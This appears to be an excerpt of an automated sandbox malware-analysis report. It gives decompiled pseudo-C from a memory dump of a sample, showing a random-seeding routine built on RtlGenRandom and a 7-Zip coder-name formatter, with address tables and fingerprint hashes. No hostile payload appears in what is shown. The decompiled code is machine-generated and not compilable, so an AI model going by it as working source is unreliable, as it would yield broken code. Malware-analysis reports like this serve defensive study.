                                                                                                    0x003e6996
                                                                                                    0x00000000
                                                                                                    0x003e676a
                                                                                                    0x003e662c
                                                                                                    0x003e663b
                                                                                                    0x003e663e
                                                                                                    0x003e6640
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003e6646
                                                                                                    0x003e6649
                                                                                                    0x003e664b
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003e6651
                                                                                                    0x003e6653
                                                                                                    0x003e6655
                                                                                                    0x003e6658
                                                                                                    0x003e6685
                                                                                                    0x003e6688
                                                                                                    0x003e66d2
                                                                                                    0x003e66d2
                                                                                                    0x003e66d6
                                                                                                    0x003e6987
                                                                                                    0x003e6987
                                                                                                    0x00000000
                                                                                                    0x003e6987
                                                                                                    0x003e66dc
                                                                                                    0x003e66e0
                                                                                                    0x003e6713
                                                                                                    0x003e6678
                                                                                                    0x003e6678
                                                                                                    0x00000000
                                                                                                    0x003e667f
                                                                                                    0x003e66ed
                                                                                                    0x003e66fd
                                                                                                    0x00000000
                                                                                                    0x003e66fd
                                                                                                    0x003e668d
                                                                                                    0x003e6698
                                                                                                    0x003e669f
                                                                                                    0x003e66a0
                                                                                                    0x003e66a5
                                                                                                    0x003e66a7
                                                                                                    0x003e66b6
                                                                                                    0x003e66b6
                                                                                                    0x003e66b8
                                                                                                    0x003e66b8
                                                                                                    0x003e66c0
                                                                                                    0x003e66c4
                                                                                                    0x003e66c9
                                                                                                    0x003e66cc
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003e66cc
                                                                                                    0x003e665a
                                                                                                    0x003e665e
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003e6667
                                                                                                    0x003e666b
                                                                                                    0x003e6678
                                                                                                    0x00000000
                                                                                                    0x003e65d2
                                                                                                    0x003e65d4
                                                                                                    0x003e65e3
                                                                                                    0x003e65ea
                                                                                                    0x003e65fe
                                                                                                    0x003e6605
                                                                                                    0x003e660b
                                                                                                    0x003e6956
                                                                                                    0x003e6956
                                                                                                    0x003e6956
                                                                                                    0x003e6605
                                                                                                    0x003e695b
                                                                                                    0x003e695b
                                                                                                    0x003e6961
                                                                                                    0x00000000

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: fputs$H_prolog
                                                                                                    • String ID: @$data:
                                                                                                    • API String ID: 2614055831-1130426132
                                                                                                    • Opcode ID: 812792af91f1e8761d3d0cd98f99d4156f75fa8d6caf8b771cba9b68237945bc
                                                                                                    • Instruction ID: 40fadb25b1eb0f2777a1858ada26dc31f88185449e404b22097223b2b0311bca
                                                                                                    • Opcode Fuzzy Hash: 812792af91f1e8761d3d0cd98f99d4156f75fa8d6caf8b771cba9b68237945bc
                                                                                                    • Instruction Fuzzy Hash: E0D11671900259EFCF16DFA5C992AEEB7B5FF68344F204629E446A72D1D730AD08CB60
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040AE10 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 84libraryloaderthreadCOMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 85%
                                                                                                    			E0040AE10(void* __ecx, void* __eflags) {
				void* _t34;
				_Unknown_base(*)()* _t36;
				struct HINSTANCE__* _t62;
				void* _t63;
				void* _t64;
				void* _t65;
				void* _t66;

				_t64 = __ecx;
				E0041E980(_t66 + 0x1c);
				_t65 = 0x3e8;
				 *(_t66 + 0x14) = GetCurrentProcessId();
				E0041EFA0(_t66 + 0x20, _t66 + 0x14, 4);
				 *(_t66 + 0x14) = GetCurrentThreadId();
				E0041EFA0(_t66 + 0x20, _t66 + 0x14, 4);
				_t62 = LoadLibraryW(L"advapi32.dll");
				if(_t62 != 0) {
					_t36 = GetProcAddress(_t62, "SystemFunction036");
					if(_t36 != 0) {
						_push(0x20);
						_push(_t66 + 0x9c);
						if( *_t36() != 0) {
							_t65 = 0x64;
							E0041EFA0(_t66 + 0x20, _t66 + 0xa0, 0x20);
						}
					}
					FreeLibrary(_t62);
				}
				do {
					if(QueryPerformanceCounter(_t66 + 0x14) != 0) {
						E0041EFA0(_t66 + 0x20, _t66 + 0x18, 8);
					}
					 *(_t66 + 0x14) = GetTickCount();
					E0041EFA0(_t66 + 0x20, _t66 + 0x14, 4);
					_t63 = 0x64;
					do {
						E0041F030(_t66 + 0x1c, _t64);
						E0041E980(_t66 + 0x1c);
						E0041EFA0(_t66 + 0x20, _t64, 0x20);
						_t63 = _t63 - 1;
					} while (_t63 != 0);
					_t65 = _t65 - 1;
				} while (_t65 != 0);
				_t34 = E0041F030(_t66 + 0x1c, _t64);
				 *((char*)(_t64 + 0x20)) = 0;
				return _t34;
			}










                                                                                                    0x0040ae19
                                                                                                    0x0040ae20
                                                                                                    0x0040ae25
                                                                                                    0x0040ae3a
                                                                                                    0x0040ae3e
                                                                                                    0x0040ae53
                                                                                                    0x0040ae57
                                                                                                    0x0040ae67
                                                                                                    0x0040ae6b
                                                                                                    0x0040ae73
                                                                                                    0x0040ae7b
                                                                                                    0x0040ae84
                                                                                                    0x0040ae86
                                                                                                    0x0040ae8b
                                                                                                    0x0040ae9a
                                                                                                    0x0040ae9f
                                                                                                    0x0040ae9f
                                                                                                    0x0040ae8b
                                                                                                    0x0040aea5
                                                                                                    0x0040aea5
                                                                                                    0x0040aeb1
                                                                                                    0x0040aebe
                                                                                                    0x0040aeca
                                                                                                    0x0040aeca
                                                                                                    0x0040aedb
                                                                                                    0x0040aedf
                                                                                                    0x0040aee4
                                                                                                    0x0040aee9
                                                                                                    0x0040aeef
                                                                                                    0x0040aef8
                                                                                                    0x0040af05
                                                                                                    0x0040af0a
                                                                                                    0x0040af0a
                                                                                                    0x0040af0d
                                                                                                    0x0040af0d
                                                                                                    0x0040af16
                                                                                                    0x0040af1b
                                                                                                    0x0040af29

                                                                                                    APIs
                                                                                                    • GetCurrentProcessId.KERNEL32(?,0043A8F8), ref: 0040AE2A
                                                                                                      • Part of subcall function 0041EFA0: memcpy.MSVCRT ref: 0041EFCF
                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 0040AE43
                                                                                                      • Part of subcall function 0041EFA0: memcpy.MSVCRT ref: 0041EFEB
                                                                                                      • Part of subcall function 0041EFA0: memcpy.MSVCRT ref: 0041F020
                                                                                                    • LoadLibraryW.KERNEL32(advapi32.dll,00000004,?,0043A8F8), ref: 0040AE61
                                                                                                    • GetProcAddress.KERNEL32(00000000,SystemFunction036), ref: 0040AE73
                                                                                                    • FreeLibrary.KERNEL32(00000000,?,0043A8F8), ref: 0040AEA5
                                                                                                    • QueryPerformanceCounter.KERNEL32(?,?,0043A8F8), ref: 0040AEB6
                                                                                                    • GetTickCount.KERNEL32 ref: 0040AECF
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcpy$CurrentLibrary$AddressCountCounterFreeLoadPerformanceProcProcessQueryThreadTick
                                                                                                    • String ID: SystemFunction036$advapi32.dll$Net
                                                                                                    • API String ID: 3940253874-1323749306
                                                                                                    • Opcode ID: fd038e07ec5bd1efc8475354fb864a268adf7a13f2b229451e76c341d097c07f
                                                                                                    • Instruction ID: 0872283f90b77c48f94bbd1dc28b2840ee8b2a3fba63005e76e1516988181712
                                                                                                    • Opcode Fuzzy Hash: fd038e07ec5bd1efc8475354fb864a268adf7a13f2b229451e76c341d097c07f
                                                                                                    • Instruction Fuzzy Hash: E531A4702443069BD310EF21E845BABB3A4BFC4704F80492DF985671D5EB789A0ECB9B
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003F8752 Relevance: 16.1, APIs: 1, Strings: 8, Instructions: 347COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 99%
                                                                                                    			E003F8752(void* __ecx) {
				void* __edi;
				intOrPtr _t170;
				signed int _t173;
				void* _t174;
				signed int _t175;
				signed int _t176;
				void* _t179;
				signed int _t186;
				char* _t189;
				signed int _t190;
				char* _t193;
				char* _t194;
				char* _t195;
				signed int _t197;
				char* _t199;
				void* _t202;
				signed int _t206;
				signed int _t218;
				signed int _t221;
				void* _t223;
				void* _t224;
				void* _t225;
				signed int _t226;
				signed int _t227;
				signed int _t228;
				signed int _t229;
				intOrPtr _t233;
				void* _t243;
				signed int _t245;
				char* _t246;
				intOrPtr* _t248;
				signed char _t249;
				char _t252;
				void* _t256;
				void* _t261;
				signed int _t262;
				signed int _t264;
				char _t267;
				signed int _t268;
				void* _t269;
				signed int _t290;
				signed int _t291;
				void* _t297;
				signed char* _t298;
				signed int _t299;
				void* _t300;
				signed int _t302;
				signed int _t303;
				signed int _t305;
				signed int _t306;
				void* _t307;

				E0041F1B0(0x427704, _t307);
				E003B92F2( *((intOrPtr*)(_t307 + 0xc)));
				_t262 =  *(_t307 + 8);
				if(_t262 != 0xffffffff) {
					_t170 =  *((intOrPtr*)(__ecx + 0xe8));
					 *(_t307 - 0x61) =  *(_t307 - 0x61) & 0x00000000;
					_t233 =  *((intOrPtr*)(_t170 + _t262 * 4));
					 *(_t307 - 0x24) =  *(_t307 - 0x24) & 0x00000000;
					_t221 = 0xff;
					 *(_t307 - 0x14) = 0xff;
					 *((intOrPtr*)(_t307 - 0x2c)) =  *((intOrPtr*)(__ecx + 0xec)) + _t233;
					 *((intOrPtr*)(_t307 - 0x28)) =  *((intOrPtr*)(_t170 + 4 + _t262 * 4)) - _t233;
					_t173 = E003FAFBA(_t307 - 0x2c, _t262, __eflags);
					 *(_t307 + 0xb) =  *(_t307 + 0xb) & 0x00000000;
					 *(_t307 - 0x30) = _t173;
					__eflags = _t173;
					if(_t173 == 0) {
						L82:
						_t174 = E003B914B( *((intOrPtr*)(_t307 + 0xc)), _t307 + _t221 - 0x160);
						goto L83;
					} else {
						goto L3;
					}
					while(1) {
						L3:
						__eflags = _t221 - 0x20;
						if(_t221 < 0x20) {
							break;
						}
						_t175 = E003FAE31(_t307 - 0x2c);
						_t264 =  *(_t307 - 0x24);
						 *(_t307 - 0x15) = _t175;
						_t176 = _t175 & 0x0000000f;
						__eflags = _t176;
						 *(_t307 - 0x34) = _t176;
						 *(_t307 - 0x20) = 0;
						 *(_t307 - 0x1c) = 0;
						_t297 = _t264 +  *((intOrPtr*)(_t307 - 0x2c));
						 *(_t307 - 0x10) = 0;
						if(_t176 <= 0) {
							L7:
							 *(_t307 - 0x24) =  *(_t307 - 0x24) +  *(_t307 - 0x34);
							__eflags =  *(_t307 - 0x15) & 0x00000010;
							if(__eflags != 0) {
								E003FAFBA(_t307 - 0x2c, _t264, __eflags);
								E003FAFBA(_t307 - 0x2c, _t264, __eflags);
							}
							_t179 = 0;
							_t298 = 0;
							__eflags =  *(_t307 - 0x15) & 0x00000020;
							if(__eflags != 0) {
								_t179 = E003FAFBA(_t307 - 0x2c, _t264, __eflags);
								_t55 = _t307 - 0x24;
								 *_t55 =  *(_t307 - 0x24);
								__eflags =  *_t55;
								_t298 =  *(_t307 - 0x24) +  *((intOrPtr*)(_t307 - 0x2c));
							}
							 *(_t307 - 0x60) =  *(_t307 - 0x60) & 0x00000000;
							__eflags =  *(_t307 - 0x1c);
							if(__eflags > 0) {
								L68:
								E003B2690(_t307 - 0x40);
								 *(_t307 - 4) =  *(_t307 - 4) & 0x00000000;
								E003BA581(_t307 - 0x40,  *(_t307 - 0x20),  *(_t307 - 0x1c));
								__eflags =  *(_t307 + 0xb);
								if( *(_t307 + 0xb) != 0) {
									_t221 = _t221 - 1;
									__eflags = _t221;
									 *((char*)(_t307 + _t221 - 0x160)) = 0x20;
								}
								_t299 =  *(_t307 - 0x3c);
								__eflags = _t299;
								if(_t299 != 0) {
									_t182 = _t299 + 5;
									__eflags = _t299 + 5 - _t221;
									if(_t299 + 5 > _t221) {
										E003B1E40(_t182,  *((intOrPtr*)(_t307 - 0x40)));
										break;
									}
									_t221 = _t221 - _t299;
									_t184 = 0;
									__eflags = _t299;
									 *(_t307 - 0x14) = _t221;
									if(_t299 <= 0) {
										goto L76;
									}
									_t243 = _t307 + _t221 - 0x160;
									do {
										 *((char*)(_t243 + _t184)) =  *((intOrPtr*)(_t184 +  *((intOrPtr*)(_t307 - 0x40))));
										_t184 = _t184 + 1;
										__eflags = _t184 - _t299;
									} while (_t184 < _t299);
									goto L76;
								} else {
									_t221 = _t221 - E003F826D(_t307 + _t221 - 0x160,  *(_t307 - 0x20),  *(_t307 - 0x1c));
									 *(_t307 - 0x14) = _t221;
									L76:
									 *(_t307 - 4) =  *(_t307 - 4) | 0xffffffff;
									E003B1E40(_t184,  *((intOrPtr*)(_t307 - 0x40)));
									L66:
									_t124 = _t307 - 0x30;
									 *_t124 =  *(_t307 - 0x30) - 1;
									__eflags =  *_t124;
									 *(_t307 + 0xb) = 1;
									if( *_t124 != 0) {
										continue;
									}
									goto L82;
								}
							}
							if(__eflags < 0) {
								L14:
								_t245 =  *(_t307 - 0x20);
								__eflags = _t245 - 0x30101;
								if(_t245 != 0x30101) {
									__eflags = _t245 - 0x21;
									if(_t245 != 0x21) {
										__eflags = _t245 - 0x30401;
										if(_t245 != 0x30401) {
											__eflags = _t245 - 3;
											if(_t245 != 3) {
												__eflags = _t245 - 0xa;
												if(_t245 != 0xa) {
													__eflags = _t245 - 0x303011b;
													if(_t245 != 0x303011b) {
														__eflags = _t245 - 0x3030103;
														if(_t245 != 0x3030103) {
															__eflags = _t245 - 0x6f10701;
															if(_t245 != 0x6f10701) {
																goto L68;
															}
															__eflags = _t179 - 1;
															 *(_t307 - 0x10) = "7zAES";
															if(_t179 < 1) {
																L24:
																_t186 =  *(_t307 - 0x10);
																__eflags = _t186;
																if(_t186 == 0) {
																	goto L68;
																}
																_t267 =  *_t186;
																_t300 = 0;
																__eflags = _t267;
																if(_t267 == 0) {
																	L27:
																	_t226 = 0;
																	__eflags =  *(_t307 - 0x60);
																	if( *(_t307 - 0x60) == 0) {
																		L29:
																		__eflags = _t226;
																		_t290 = _t226 + _t300;
																		if(_t226 != 0) {
																			_t290 = _t290 + 1;
																			__eflags = _t290;
																		}
																		__eflags =  *(_t307 + 0xb);
																		if( *(_t307 + 0xb) != 0) {
																			_t290 = _t290 + 1;
																			__eflags = _t290;
																		}
																		__eflags = _t290 + 5 -  *(_t307 - 0x14);
																		if(_t290 + 5 >=  *(_t307 - 0x14)) {
																			_t221 =  *(_t307 - 0x14);
																			break;
																		} else {
																			 *(_t307 - 0x14) =  *(_t307 - 0x14) - _t290;
																			_t246 =  *(_t307 - 0x10);
																			_t189 = _t307 +  *(_t307 - 0x14) - 0x160;
																			 *_t189 = _t267;
																			_t190 = _t189 + 1;
																			__eflags = _t190;
																			while(1) {
																				_t246 =  &(_t246[1]);
																				__eflags = _t267;
																				if(_t267 == 0) {
																					break;
																				}
																				_t267 =  *_t246;
																				 *_t190 = _t267;
																				_t190 = _t190 + 1;
																			}
																			__eflags = _t226;
																			if(_t226 == 0) {
																				L63:
																				__eflags =  *(_t307 + 0xb);
																				if( *(_t307 + 0xb) != 0) {
																					_t290 = _t290 +  *(_t307 - 0x14);
																					__eflags = _t290;
																					 *((char*)(_t307 + _t290 - 0x161)) = 0x20;
																				}
																				_t221 =  *(_t307 - 0x14);
																				goto L66;
																			}
																			_t193 = _t307 + _t300 +  *(_t307 - 0x14) - 0x160;
																			 *_t193 = 0x3a;
																			_t194 = _t193 + 1;
																			 *_t194 =  *(_t307 - 0x60);
																			_t195 = _t194 + 1;
																			__eflags =  *(_t307 - 0x60);
																			_t248 = _t307 - 0x5f;
																			if( *(_t307 - 0x60) == 0) {
																				goto L63;
																			} else {
																				goto L62;
																			}
																			do {
																				L62:
																				_t268 =  *_t248;
																				 *_t195 = _t268;
																				_t195 = _t195 + 1;
																				_t248 = _t248 + 1;
																				__eflags = _t268;
																			} while (_t268 != 0);
																			goto L63;
																		}
																	} else {
																		goto L28;
																	}
																	do {
																		L28:
																		_t226 = _t226 + 1;
																		__eflags =  *((char*)(_t307 + _t226 - 0x60));
																	} while ( *((char*)(_t307 + _t226 - 0x60)) != 0);
																	goto L29;
																} else {
																	goto L26;
																}
																do {
																	L26:
																	_t300 = _t300 + 1;
																	__eflags =  *((char*)(_t300 + _t186));
																} while ( *((char*)(_t300 + _t186)) != 0);
																goto L27;
															}
															_t269 = _t307 - 0x60;
															_t197 =  *_t298 & 0x0000003f;
															__eflags = _t197;
															_t249 = _t197;
															L59:
															L003B18AD(_t249, _t269);
															goto L24;
														}
														 *(_t307 - 0x10) = "BCJ";
														goto L24;
													}
													 *(_t307 - 0x10) = "BCJ2";
													goto L24;
												}
												__eflags = _t179 - 4;
												 *(_t307 - 0x10) = 0x4295c0;
												if(_t179 != 4) {
													goto L24;
												}
												_t249 =  *_t298;
												_t269 = _t307 - 0x60;
												goto L59;
											}
											__eflags = _t179 - 1;
											 *(_t307 - 0x10) = 0x42e9a8;
											if(_t179 != 1) {
												goto L24;
											}
											_t269 = _t307 - 0x60;
											_t249 = ( *_t298 & 0x000000ff) + 1;
											goto L59;
										}
										__eflags = _t179 - 5;
										 *(_t307 - 0x10) = "PPMD";
										if(_t179 != 5) {
											goto L24;
										}
										 *(_t307 - 0x60) = 0x6f;
										_t290 = ":mem";
										_t199 = L003B18AD( *_t298 & 0x000000ff, _t307 - 0x5f);
										_t252 = ":mem"; // 0x3a
										while(1) {
											__eflags = _t252;
											 *_t199 = _t252;
											if(_t252 == 0) {
												break;
											}
											_t252 =  *(_t290 + 1);
											_t290 = _t290 + 1;
											_t199 = _t199 + 1;
										}
										E003F8550(_t199, _t298[1], _t290);
										goto L24;
									}
									__eflags = _t179 - 1;
									 *(_t307 - 0x10) = 0x42e990;
									if(_t179 == 1) {
										E003F85C2(_t307 - 0x60,  *_t298 & 0x000000ff);
									}
									goto L24;
								}
								__eflags = _t179 - 5;
								 *(_t307 - 0x10) = "LZMA";
								if(_t179 == 5) {
									_t202 = E003F8550(_t307 - 0x60, _t298[1], _t290);
									_t302 =  *_t298 & 0x000000ff;
									__eflags = _t302 - 0x5d;
									_t256 = _t202;
									if(_t302 != 0x5d) {
										_t291 = 9;
										_t303 = 9;
										_t227 = 5;
										_t290 = _t302 % _t291;
										_t206 = _t302 / _t303;
										_t228 = _t206 / _t227;
										_t305 = 5;
										__eflags = _t290 - 3;
										_t306 = _t206 % _t305;
										if(_t290 != 3) {
											_t256 = E003F8BA0(_t256, "lc", _t290);
										}
										__eflags = _t306;
										if(_t306 != 0) {
											_t256 = E003F8BA0(_t256, "lp", _t306);
										}
										__eflags = _t228 - 2;
										if(_t228 != 2) {
											E003F8BA0(_t256, "pb", _t228);
										}
										_t221 =  *(_t307 - 0x14);
									}
								}
								goto L24;
							}
							__eflags =  *(_t307 - 0x20) - 0xffffffff;
							if( *(_t307 - 0x20) > 0xffffffff) {
								goto L68;
							}
							goto L14;
						} else {
							goto L5;
						}
						goto L7;
						L5:
						_t261 = 8;
						asm("cdq");
						_t229 = _t264;
						_t264 =  *(_t307 - 0x1c);
						_t218 = E0041F4F0( *(_t307 - 0x20), _t261, _t264);
						 *(_t307 - 0x10) =  &(( *(_t307 - 0x10))[1]);
						 *(_t307 - 0x20) = ( *(_t307 - 0x10))[_t297] & 0x000000ff | _t218;
						 *(_t307 - 0x1c) = _t229 | _t264;
						__eflags =  *(_t307 - 0x10) -  *(_t307 - 0x34);
						if( *(_t307 - 0x10) <  *(_t307 - 0x34)) {
							goto L5;
						} else {
							_t221 =  *(_t307 - 0x14);
							goto L7;
						}
					}
					__eflags =  *(_t307 - 0x30);
					if( *(_t307 - 0x30) != 0) {
						__eflags = _t221 - 4;
						if(_t221 >= 4) {
							_t223 = _t221 - 1;
							 *((char*)(_t307 + _t223 - 0x160)) = 0x20;
							_t224 = _t223 - 1;
							 *((char*)(_t307 + _t224 - 0x160)) = 0x2e;
							_t225 = _t224 - 1;
							 *((char*)(_t307 + _t225 - 0x160)) = 0x2e;
							_t221 = _t225 - 1;
							__eflags = _t221;
							 *((char*)(_t307 + _t221 - 0x160)) = 0x2e;
						}
					}
					goto L82;
				} else {
					_t174 = 0;
					L83:
					 *[fs:0x0] =  *((intOrPtr*)(_t307 - 0xc));
					return _t174;
				}
			}






















































                                                                                                    0x003f8757
                                                                                                    0x003f8768
                                                                                                    0x003f876d
                                                                                                    0x003f8773
                                                                                                    0x003f877c
                                                                                                    0x003f8782
                                                                                                    0x003f878d
                                                                                                    0x003f8794
                                                                                                    0x003f8798
                                                                                                    0x003f87a5
                                                                                                    0x003f87a8
                                                                                                    0x003f87ab
                                                                                                    0x003f87ae
                                                                                                    0x003f87b3
                                                                                                    0x003f87b7
                                                                                                    0x003f87ba
                                                                                                    0x003f87bc
                                                                                                    0x003f8b80
                                                                                                    0x003f8b8a
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003f87c2
                                                                                                    0x003f87c2
                                                                                                    0x003f87c2
                                                                                                    0x003f87c5
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003f87ce
                                                                                                    0x003f87d3
                                                                                                    0x003f87d6
                                                                                                    0x003f87db
                                                                                                    0x003f87db
                                                                                                    0x003f87de
                                                                                                    0x003f87e4
                                                                                                    0x003f87e7
                                                                                                    0x003f87ea
                                                                                                    0x003f87ed
                                                                                                    0x003f87f0
                                                                                                    0x003f8824
                                                                                                    0x003f8827
                                                                                                    0x003f882a
                                                                                                    0x003f882e
                                                                                                    0x003f8833
                                                                                                    0x003f883b
                                                                                                    0x003f883b
                                                                                                    0x003f8840
                                                                                                    0x003f8842
                                                                                                    0x003f8844
                                                                                                    0x003f8848
                                                                                                    0x003f884d
                                                                                                    0x003f8858
                                                                                                    0x003f8858
                                                                                                    0x003f8858
                                                                                                    0x003f885b
                                                                                                    0x003f885b
                                                                                                    0x003f885e
                                                                                                    0x003f8862
                                                                                                    0x003f8866
                                                                                                    0x003f8ac1
                                                                                                    0x003f8ac4
                                                                                                    0x003f8acc
                                                                                                    0x003f8ad6
                                                                                                    0x003f8adb
                                                                                                    0x003f8adf
                                                                                                    0x003f8ae1
                                                                                                    0x003f8ae1
                                                                                                    0x003f8ae2
                                                                                                    0x003f8ae2
                                                                                                    0x003f8aea
                                                                                                    0x003f8aed
                                                                                                    0x003f8aef
                                                                                                    0x003f8b0a
                                                                                                    0x003f8b0d
                                                                                                    0x003f8b0f
                                                                                                    0x003f8b46
                                                                                                    0x00000000
                                                                                                    0x003f8b4b
                                                                                                    0x003f8b11
                                                                                                    0x003f8b13
                                                                                                    0x003f8b15
                                                                                                    0x003f8b17
                                                                                                    0x003f8b1a
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003f8b1c
                                                                                                    0x003f8b23
                                                                                                    0x003f8b29
                                                                                                    0x003f8b2c
                                                                                                    0x003f8b2d
                                                                                                    0x003f8b2d
                                                                                                    0x00000000
                                                                                                    0x003f8af1
                                                                                                    0x003f8b03
                                                                                                    0x003f8b05
                                                                                                    0x003f8b31
                                                                                                    0x003f8b34
                                                                                                    0x003f8b38
                                                                                                    0x003f8aaf
                                                                                                    0x003f8aaf
                                                                                                    0x003f8aaf
                                                                                                    0x003f8aaf
                                                                                                    0x003f8ab2
                                                                                                    0x003f8ab6
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003f8abc
                                                                                                    0x003f8aef
                                                                                                    0x003f886c
                                                                                                    0x003f8878
                                                                                                    0x003f8878
                                                                                                    0x003f887b
                                                                                                    0x003f8881
                                                                                                    0x003f896f
                                                                                                    0x003f8972
                                                                                                    0x003f8990
                                                                                                    0x003f8996
                                                                                                    0x003f89de
                                                                                                    0x003f89e1
                                                                                                    0x003f89fc
                                                                                                    0x003f89ff
                                                                                                    0x003f8a18
                                                                                                    0x003f8a1e
                                                                                                    0x003f8a2c
                                                                                                    0x003f8a32
                                                                                                    0x003f8a40
                                                                                                    0x003f8a46
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003f8a48
                                                                                                    0x003f8a4b
                                                                                                    0x003f8a52
                                                                                                    0x003f8908
                                                                                                    0x003f8908
                                                                                                    0x003f890b
                                                                                                    0x003f890d
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003f8913
                                                                                                    0x003f8915
                                                                                                    0x003f8917
                                                                                                    0x003f8919
                                                                                                    0x003f8922
                                                                                                    0x003f8922
                                                                                                    0x003f8924
                                                                                                    0x003f8927
                                                                                                    0x003f8931
                                                                                                    0x003f8931
                                                                                                    0x003f8933
                                                                                                    0x003f8936
                                                                                                    0x003f8938
                                                                                                    0x003f8938
                                                                                                    0x003f8938
                                                                                                    0x003f8939
                                                                                                    0x003f893d
                                                                                                    0x003f893f
                                                                                                    0x003f893f
                                                                                                    0x003f893f
                                                                                                    0x003f8943
                                                                                                    0x003f8946
                                                                                                    0x003f8b4e
                                                                                                    0x00000000
                                                                                                    0x003f894c
                                                                                                    0x003f894c
                                                                                                    0x003f894f
                                                                                                    0x003f8955
                                                                                                    0x003f895c
                                                                                                    0x003f895e
                                                                                                    0x003f895e
                                                                                                    0x003f895f
                                                                                                    0x003f895f
                                                                                                    0x003f8960
                                                                                                    0x003f8962
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003f8968
                                                                                                    0x003f896a
                                                                                                    0x003f896c
                                                                                                    0x003f896c
                                                                                                    0x003f8a6c
                                                                                                    0x003f8a6e
                                                                                                    0x003f8a99
                                                                                                    0x003f8a99
                                                                                                    0x003f8a9d
                                                                                                    0x003f8aa2
                                                                                                    0x003f8aa2
                                                                                                    0x003f8aa4
                                                                                                    0x003f8aa4
                                                                                                    0x003f8aac
                                                                                                    0x00000000
                                                                                                    0x003f8aac
                                                                                                    0x003f8a75
                                                                                                    0x003f8a7c
                                                                                                    0x003f8a82
                                                                                                    0x003f8a83
                                                                                                    0x003f8a85
                                                                                                    0x003f8a86
                                                                                                    0x003f8a8a
                                                                                                    0x003f8a8d
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003f8a8f
                                                                                                    0x003f8a8f
                                                                                                    0x003f8a8f
                                                                                                    0x003f8a91
                                                                                                    0x003f8a93
                                                                                                    0x003f8a94
                                                                                                    0x003f8a95
                                                                                                    0x003f8a95
                                                                                                    0x00000000
                                                                                                    0x003f8a8f
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003f8929
                                                                                                    0x003f8929
                                                                                                    0x003f8929
                                                                                                    0x003f892a
                                                                                                    0x003f892a
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003f891b
                                                                                                    0x003f891b
                                                                                                    0x003f891b
                                                                                                    0x003f891c
                                                                                                    0x003f891c
                                                                                                    0x00000000
                                                                                                    0x003f891b
                                                                                                    0x003f8a5a
                                                                                                    0x003f8a5d
                                                                                                    0x003f8a5d
                                                                                                    0x003f8a60
                                                                                                    0x003f8a62
                                                                                                    0x003f8a62
                                                                                                    0x00000000
                                                                                                    0x003f8a62
                                                                                                    0x003f8a34
                                                                                                    0x00000000
                                                                                                    0x003f8a34
                                                                                                    0x003f8a20
                                                                                                    0x00000000
                                                                                                    0x003f8a20
                                                                                                    0x003f8a01
                                                                                                    0x003f8a04
                                                                                                    0x003f8a0b
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003f8a11
                                                                                                    0x003f8a13
                                                                                                    0x00000000
                                                                                                    0x003f8a13
                                                                                                    0x003f89e3
                                                                                                    0x003f89e6
                                                                                                    0x003f89ed
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003f89f6
                                                                                                    0x003f89f9
                                                                                                    0x00000000
                                                                                                    0x003f89f9
                                                                                                    0x003f8998
                                                                                                    0x003f899b
                                                                                                    0x003f89a2
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003f89a8
                                                                                                    0x003f89b2
                                                                                                    0x003f89b7
                                                                                                    0x003f89bc
                                                                                                    0x003f89c2
                                                                                                    0x003f89c2
                                                                                                    0x003f89c4
